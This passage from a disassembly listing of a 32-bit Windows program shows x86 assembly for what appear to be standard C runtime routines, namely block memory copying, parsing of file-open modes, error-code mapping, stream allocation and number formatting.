lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_419116
push ebx
call sub_41CD5C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_4190E6
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_418EBA
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_4190FD
; ---------------------------------------------------------------------------
loc_4190E6: ; CODE XREF: sub_419087+49�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_4190FD: ; CODE XREF: sub_419087+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41910E
mov eax, [ebp+var_1C]
jmp short loc_41912C
sub_419087 endp
; =============== S U B R O U T I N E =======================================
sub_41910B proc near ; DATA XREF: .rdata:stru_429040�o
mov ebx, [ebp+8]
sub_41910B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41910E proc near ; CODE XREF: sub_419087+7A�p
push ebx
call sub_41CDCF
pop ecx
retn
sub_41910E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419087
loc_419116: ; CODE XREF: sub_419087+15�j
; sub_419087+35�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41912C: ; CODE XREF: sub_419087+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_419087
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419140 proc near ; CODE XREF: sub_414A85+5F�p
; sub_414BBA+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_419160
cmp edi, eax
jb loc_4192DC
loc_419160: ; CODE XREF: sub_419140+16�j
test edi, 3
jnz short loc_41917C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41919C
rep movsd
jmp ds:off_41928C[edx*4]
; ---------------------------------------------------------------------------
loc_41917C: ; CODE XREF: sub_419140+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_419194
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41919C+4[eax*4]
; ---------------------------------------------------------------------------
loc_419194: ; CODE XREF: sub_419140+46�j
jmp dword ptr ds:loc_41929C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41919C: ; CODE XREF: sub_419140+31�j
; sub_419140+8E�j ...
jmp ds:off_419220[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4191B0
dd offset loc_4191DC
dd offset loc_419200
; ---------------------------------------------------------------------------
loc_4191B0: ; DATA XREF: sub_419140+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41919C
rep movsd
jmp ds:off_41928C[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4191DC: ; DATA XREF: sub_419140+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41919C
rep movsd
jmp ds:off_41928C[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_419200: ; DATA XREF: sub_419140+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41919C
rep movsd
jmp ds:off_41928C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_419220 dd offset loc_419283 ; DATA XREF: sub_419140:loc_41919C�r
dd offset loc_419270
dd offset loc_419268
dd offset loc_419260
dd offset loc_419258
dd offset loc_419250
dd offset loc_419248
dd offset loc_419240
; ---------------------------------------------------------------------------
loc_419240: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_419248: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_419250: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_419258: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_419260: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_419268: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_419270: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_419283: ; CODE XREF: sub_419140:loc_41919C�j
; DATA XREF: sub_419140:off_419220�o
jmp ds:off_41928C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41928C dd offset loc_41929C ; DATA XREF: sub_419140+35�r
; sub_419140+92�r ...
dd offset loc_4192A4
dd offset loc_4192B0
dd offset loc_4192C4
; ---------------------------------------------------------------------------
loc_41929C: ; CODE XREF: sub_419140+35�j
; sub_419140+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4192A4: ; CODE XREF: sub_419140+35�j
; sub_419140+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4192B0: ; CODE XREF: sub_419140+35�j
; sub_419140+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4192C4: ; CODE XREF: sub_419140+35�j
; sub_419140+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4192DC: ; CODE XREF: sub_419140+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_419310
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_419304
std
rep movsd
cld
jmp ds:off_419428[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_419304: ; CODE XREF: sub_419140+1B5�j
; sub_419140+210�j ...
neg ecx
jmp ds:off_4193D8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_419310: ; CODE XREF: sub_419140+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_419328
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_419328+4[eax*4]
; ---------------------------------------------------------------------------
loc_419328: ; CODE XREF: sub_419140+1DA�j
; DATA XREF: sub_419140+1E1�r
jmp ds:off_419428[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41933C
dd offset loc_419360
dd offset loc_419388
; ---------------------------------------------------------------------------
loc_41933C: ; DATA XREF: sub_419140+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_419304
std
rep movsd
cld
jmp ds:off_419428[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_419360: ; DATA XREF: sub_419140+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_419304
std
rep movsd
cld
jmp ds:off_419428[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_419388: ; DATA XREF: sub_419140+1F8�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_419304
std
rep movsd
cld
jmp ds:off_419428[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4193DC
dd offset loc_4193E4
dd offset loc_4193EC
dd offset loc_4193F4
dd offset loc_4193FC
dd offset loc_419404
dd offset loc_41940C
off_4193D8 dd offset loc_41941F ; DATA XREF: sub_419140+1C6�r
; ---------------------------------------------------------------------------
loc_4193DC: ; DATA XREF: sub_419140+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4193E4: ; DATA XREF: sub_419140+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4193EC: ; DATA XREF: sub_419140+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4193F4: ; DATA XREF: sub_419140+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4193FC: ; DATA XREF: sub_419140+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_419404: ; DATA XREF: sub_419140+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41940C: ; DATA XREF: sub_419140+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41941F: ; CODE XREF: sub_419140+1C6�j
; DATA XREF: sub_419140:off_4193D8�o
jmp ds:off_419428[edx*4]
; ---------------------------------------------------------------------------
align 4
off_419428 dd offset loc_419438 ; DATA XREF: sub_419140+1BB�r
; sub_419140:loc_419328�r ...
dd offset loc_419440
dd offset loc_419450
dd offset loc_419464
; ---------------------------------------------------------------------------
loc_419438: ; CODE XREF: sub_419140+1BB�j
; sub_419140:loc_419328�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_419440: ; CODE XREF: sub_419140+1BB�j
; sub_419140:loc_419328�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_419450: ; CODE XREF: sub_419140+1BB�j
; sub_419140:loc_419328�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_419464: ; CODE XREF: sub_419140+1BB�j
; sub_419140:loc_419328�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_419140 endp
; =============== S U B R O U T I N E =======================================
sub_41947D proc near ; CODE XREF: sub_414BBA+150�p
; sub_414BBA+19B�p ...
arg_0 = dword ptr 4
mov eax, dword_47C358
test eax, eax
jz short loc_419495
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_419495
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419495: ; CODE XREF: sub_41947D+7�j
; sub_41947D+12�j
xor eax, eax
retn
sub_41947D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419498 proc near ; CODE XREF: sub_414D67+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_47C500
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_4194D1
cmp al, 72h
jz short loc_4194CA
cmp al, 77h
jnz loc_4195DD
mov ecx, 301h
jmp short loc_4194D6
; ---------------------------------------------------------------------------
loc_4194CA: ; CODE XREF: sub_419498+21�j
xor ecx, ecx
or esi, 1
jmp short loc_4194D9
; ---------------------------------------------------------------------------
loc_4194D1: ; CODE XREF: sub_419498+1D�j
mov ecx, 109h
loc_4194D6: ; CODE XREF: sub_419498+30�j
or esi, 2
loc_4194D9: ; CODE XREF: sub_419498+37�j
xor edx, edx
inc edx
jmp loc_4195B8
; ---------------------------------------------------------------------------
loc_4194E1: ; CODE XREF: sub_419498+125�j
cmp edx, ebx
jz loc_4195C3
movsx eax, al
cmp eax, 54h
jg short loc_419562
jz short loc_419555
sub eax, 2Bh
jz short loc_41953F
sub eax, 19h
jz short loc_419535
sub eax, 0Eh
jz short loc_419521
dec eax
jnz loc_41959A
cmp [ebp+var_4], ebx
jnz loc_41959A
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_4195B8
; ---------------------------------------------------------------------------
loc_419521: ; CODE XREF: sub_419498+68�j
cmp [ebp+var_4], ebx
jnz short loc_41959A
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_4195B8
; ---------------------------------------------------------------------------
loc_419535: ; CODE XREF: sub_419498+63�j
test cl, 40h
jnz short loc_41959A
or ecx, 40h
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_41953F: ; CODE XREF: sub_419498+5E�j
test cl, 2
jnz short loc_41959A
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_419555: ; CODE XREF: sub_419498+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_41959A
or ecx, eax
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_419562: ; CODE XREF: sub_419498+57�j
sub eax, 62h
jz short loc_4195AD
dec eax
jz short loc_419595
sub eax, 0Bh
jz short loc_419581
sub eax, 6
jnz short loc_41959A
test ch, 0C0h
jnz short loc_41959A
or ecx, 4000h
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_419581: ; CODE XREF: sub_419498+D5�j
cmp [ebp+var_8], ebx
jnz short loc_41959A
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_419595: ; CODE XREF: sub_419498+D0�j
cmp [ebp+var_8], ebx
jz short loc_41959E
loc_41959A: ; CODE XREF: sub_419498+6B�j
; sub_419498+74�j ...
xor edx, edx
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_41959E: ; CODE XREF: sub_419498+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_4195B8
; ---------------------------------------------------------------------------
loc_4195AD: ; CODE XREF: sub_419498+CD�j
test ch, 0C0h
jnz short loc_41959A
or ecx, 8000h
loc_4195B8: ; CODE XREF: sub_419498+44�j
; sub_419498+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_4194E1
loc_4195C3: ; CODE XREF: sub_419498+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41D844
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_4195E1
loc_4195DD: ; CODE XREF: sub_419498+25�j
xor eax, eax
jmp short loc_4195FB
; ---------------------------------------------------------------------------
loc_4195E1: ; CODE XREF: sub_419498+143�j
mov eax, [ebp+arg_C]
inc dword_47C200
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_4195FB: ; CODE XREF: sub_419498+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_419498 endp
; =============== S U B R O U T I N E =======================================
sub_419600 proc near ; CODE XREF: sub_414D67+18�p
; sub_414F14+2B�p ...
call sub_416E15
add eax, 8
retn
sub_419600 endp
; =============== S U B R O U T I N E =======================================
sub_419609 proc near ; CODE XREF: sub_414F14+36�p
; sub_417D0C+8A�p ...
call sub_416E15
add eax, 0Ch
retn
sub_419609 endp
; =============== S U B R O U T I N E =======================================
sub_419612 proc near ; CODE XREF: sub_414F14+16�p
; sub_415C85+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_416E15
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_419621: ; CODE XREF: sub_419612+1C�j
cmp ecx, dword_42DD20[esi*8]
jz short loc_419648
inc esi
cmp esi, 2Dh
jb short loc_419621
cmp ecx, 13h
jb short loc_419659
cmp ecx, 24h
ja short loc_419659
call sub_416E15
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419648: ; CODE XREF: sub_419612+16�j
call sub_416E15
mov ecx, dword_42DD24[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_419659: ; CODE XREF: sub_419612+21�j
; sub_419612+26�j
cmp ecx, 0BCh
jb short loc_419677
cmp ecx, 0CAh
ja short loc_419677
call sub_416E15
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_419677: ; CODE XREF: sub_419612+4D�j
; sub_419612+55�j
call sub_416E15
mov dword ptr [eax+8], 16h
pop esi
retn
sub_419612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419685 proc near ; CODE XREF: sub_414D67+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_429050
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_418285
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4196A5: ; CODE XREF: sub_419685+85�j
mov [ebp+var_20], esi
cmp esi, dword_47D9A0
jge loc_419774
mov eax, dword_47C984
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_419710
test byte ptr [eax+0Ch], 83h
jnz short loc_419709
cmp esi, 2
jle short loc_4196E2
cmp esi, 14h
jge short loc_4196E2
lea eax, [esi+10h]
push eax
call sub_418206
pop ecx
test eax, eax
jz loc_419774
loc_4196E2: ; CODE XREF: sub_419685+44�j
; sub_419685+49�j
mov eax, dword_47C984
push dword ptr [eax+esi*4]
push esi
call sub_418027
pop ecx
pop ecx
mov eax, dword_47C984
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_41970C
push eax
push esi
call sub_418079
pop ecx
pop ecx
loc_419709: ; CODE XREF: sub_419685+3F�j
inc esi
jmp short loc_4196A5
; ---------------------------------------------------------------------------
loc_41970C: ; CODE XREF: sub_419685+79�j
mov edi, eax
jmp short loc_419771
; ---------------------------------------------------------------------------
loc_419710: ; CODE XREF: sub_419685+39�j
shl esi, 2
push 38h
call sub_414E7D
pop ecx
mov ecx, dword_47C984
mov [esi+ecx], eax
mov eax, dword_47C984
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_419774
push 0FA0h
add eax, 20h
push eax
call sub_41D188
pop ecx
pop ecx
test eax, eax
mov eax, dword_47C984
jnz short loc_41975C
push dword ptr [esi+eax]
call sub_414A14
pop ecx
mov eax, dword_47C984
mov [esi+eax], ebx
jmp short loc_419774
; ---------------------------------------------------------------------------
loc_41975C: ; CODE XREF: sub_419685+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
mov eax, dword_47C984
mov edi, [esi+eax]
loc_419771: ; CODE XREF: sub_419685+89�j
mov [ebp+var_1C], edi
loc_419774: ; CODE XREF: sub_419685+29�j
; sub_419685+57�j ...
cmp edi, ebx
jz short loc_41978A
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_41978A: ; CODE XREF: sub_419685+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41979E
mov eax, edi
call __SEH_epilog
retn
sub_419685 endp
; =============== S U B R O U T I N E =======================================
sub_41979B proc near ; DATA XREF: .rdata:stru_429050�o
mov edi, [ebp-1Ch]
sub_41979B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41979E proc near ; CODE XREF: sub_419685+109�p
push 1
call sub_4181F1
pop ecx
retn
sub_41979E endp
; =============== S U B R O U T I N E =======================================
sub_4197A7 proc near ; DATA XREF: sub_414EC5+1E�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_4155DC
cmp eax, 65h
jmp short loc_4197C6
; ---------------------------------------------------------------------------
loc_4197BA: ; CODE XREF: sub_4197A7+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41C33B
test eax, eax
loc_4197C6: ; CODE XREF: sub_4197A7+11�j
pop ecx
jnz short loc_4197BA
mov al, [esi]
mov cl, byte_42E0F8
mov [esi], cl
inc esi
loc_4197D4: ; CODE XREF: sub_4197A7+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_4197D4
pop esi
retn
sub_4197A7 endp
; =============== S U B R O U T I N E =======================================
sub_4197E3 proc near ; DATA XREF: sub_414EC5+A�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_42E0F8
jmp short loc_4197F5
; ---------------------------------------------------------------------------
loc_4197F0: ; CODE XREF: sub_4197E3+16�j
cmp cl, bl
jz short loc_4197FB
inc eax
loc_4197F5: ; CODE XREF: sub_4197E3+B�j
mov cl, [eax]
test cl, cl
jnz short loc_4197F0
loc_4197FB: ; CODE XREF: sub_4197E3+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41982C
jmp short loc_41980F
; ---------------------------------------------------------------------------
loc_419804: ; CODE XREF: sub_4197E3+30�j
cmp cl, 65h
jz short loc_419815
cmp cl, 45h
jz short loc_419815
inc eax
loc_41980F: ; CODE XREF: sub_4197E3+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_419804
loc_419815: ; CODE XREF: sub_4197E3+24�j
; sub_4197E3+29�j
mov edx, eax
loc_419817: ; CODE XREF: sub_4197E3+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_419817
cmp [eax], bl
jnz short loc_419822
dec eax
loc_419822: ; CODE XREF: sub_4197E3+3C�j
; sub_4197E3+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_419822
loc_41982C: ; CODE XREF: sub_4197E3+1D�j
pop ebx
retn
sub_4197E3 endp
; =============== S U B R O U T I N E =======================================
sub_41982E proc near ; DATA XREF: sub_414EC5+28�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_429060
fnstsw ax
test ah, 1
jnz short loc_419845
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_419845: ; CODE XREF: sub_41982E+11�j
xor eax, eax
retn
sub_41982E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419848 proc near ; DATA XREF: sub_414EC5+14�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_419871
lea eax, [ebp+var_8]
push eax
call sub_41DBBD
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_419871: ; CODE XREF: sub_419848+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41DC00
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_419848 endp
; =============== S U B R O U T I N E =======================================
sub_419886 proc near ; CODE XREF: sub_4198A3+23�p
; sub_4199C5+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_4198A1
push esi
call sub_4179C0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41D220
add esp, 10h
loc_4198A1: ; CODE XREF: sub_419886+5�j
pop esi
retn
sub_419886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198A3 proc near ; CODE XREF: sub_419951+5B�p
; sub_419AC9+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_4198CC
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_419886
pop edi
loc_4198CC: ; CODE XREF: sub_4198A3+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_4198D9
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_4198D9: ; CODE XREF: sub_4198A3+2E�j
cmp [ebp+arg_0], 0
jle short loc_4198F0
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_42E0F8
mov [eax], cl
loc_4198F0: ; CODE XREF: sub_4198A3+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_429068
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_419C40
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_419915
mov byte ptr [ecx], 45h
loc_419915: ; CODE XREF: sub_4198A3+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41994C
mov eax, [esi+4]
dec eax
jns short loc_419929
neg eax
mov byte ptr [ecx], 2Dh
loc_419929: ; CODE XREF: sub_4198A3+7F�j
inc ecx
cmp eax, 64h
jl short loc_419939
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_419939: ; CODE XREF: sub_4198A3+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_419949
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_419949: ; CODE XREF: sub_4198A3+9A�j
add [ecx+1], al
loc_41994C: ; CODE XREF: sub_4198A3+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_4198A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419951 proc near ; CODE XREF: sub_419B69+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DD74
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41DC43
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_4198A3
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_41A1F6
leave
retn
sub_419951 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199C5 proc near ; CODE XREF: sub_419A61+4F�p
; sub_419AC9+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_4199F2
cmp eax, [ebp+arg_4]
jnz short loc_4199F2
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_4199F2: ; CODE XREF: sub_4199C5+10�j
; sub_4199C5+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_4199FE
mov byte ptr [ebx], 2Dh
inc ebx
loc_4199FE: ; CODE XREF: sub_4199C5+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_419A15
mov eax, ebx
call sub_419886
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_419A17
; ---------------------------------------------------------------------------
loc_419A15: ; CODE XREF: sub_4199C5+41�j
add ebx, eax
loc_419A17: ; CODE XREF: sub_4199C5+4E�j
cmp [ebp+arg_4], 0
jle short loc_419A59
mov eax, ebx
call sub_419886
mov al, byte_42E0F8
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_419A59
neg esi
cmp [ebp+arg_8], 0
jnz short loc_419A40
cmp [ebp+arg_4], esi
jl short loc_419A43
loc_419A40: ; CODE XREF: sub_4199C5+74�j
mov [ebp+arg_4], esi
loc_419A43: ; CODE XREF: sub_4199C5+79�j
